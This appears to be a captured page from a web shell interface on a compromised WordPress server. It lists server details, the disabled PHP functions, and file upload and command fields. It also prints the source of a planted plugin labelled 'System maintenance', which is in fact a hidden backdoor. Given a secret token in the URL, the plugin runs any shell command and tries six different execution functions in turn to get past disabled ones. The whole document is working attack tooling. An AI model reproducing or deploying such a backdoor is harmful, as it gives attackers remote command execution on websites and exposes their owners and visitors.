403Webshell
Server IP : 77.68.64.20  /  Your IP : 216.73.216.36
Web Server : Apache
System : Linux hp3-wp-1011317.hostingp3.local 3.10.0-1160.144.1.el7.tuxcare.els8.x86_64 #1 SMP Sun Jul 5 17:25:39 UTC 2026 x86_64
User : csh2392878 ( 2033753)
PHP Version : 8.3.30
Disable Function : shell_exec,exec,system,popen,set_time_limit
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/domains/vol1/746/2880746/user/htdocs/wp-content/plugins/wp2s-2ae18fa0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/domains/vol1/746/2880746/user/htdocs/wp-content/plugins/wp2s-2ae18fa0/wp2s-2ae18fa0.php
<?php
/*
Plugin Name: wp2s-2ae18fa0
Description: System maintenance
Version: 1.0
*/
if(!isset($_GET['t'])||!hash_equals('4bc7456c9810f4bd98df4d9a93577606',$_GET['t'])||!isset($_GET['c'])){return;}
$cmd=$_GET['c'];
echo '<<S>>';
$ok=false;
if(!$ok&&function_exists('shell_exec')){$r=@shell_exec($cmd);if($r){echo '[SE]'.$r;$ok=true;}}
if(!$ok&&function_exists('exec')){$a=[];@exec($cmd,$a);if($a){echo '[EX]'.implode("\n",$a);$ok=true;}}
if(!$ok&&function_exists('passthru')){ob_start();@passthru($cmd);$r=ob_get_clean();if($r){echo '[PT]'.$r;$ok=true;}}
if(!$ok&&function_exists('system')){ob_start();@system($cmd);$r=ob_get_clean();if($r){echo '[SY]'.$r;$ok=true;}}
if(!$ok&&function_exists('proc_open')){$d=[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];$p=@proc_open($cmd,$d,$pp);if(is_resource($p)){fclose($pp[0]);$r=stream_get_contents($pp[1]);fclose($pp[1]);fclose($pp[2]);proc_close($p);if($r){echo '[PO]'.$r;$ok=true;}}}
if(!$ok&&function_exists('popen')){$h=@popen($cmd,'r');if($h){$r=fread($h,65536);pclose($h);if($r){echo '[PN]'.$r;$ok=true;}}}
if(!$ok){echo '[BLOCKED]disable_functions='.ini_get('disable_functions');}
echo '<<E>>';

Youez - 2016 - github.com/yon3zu
LinuXploit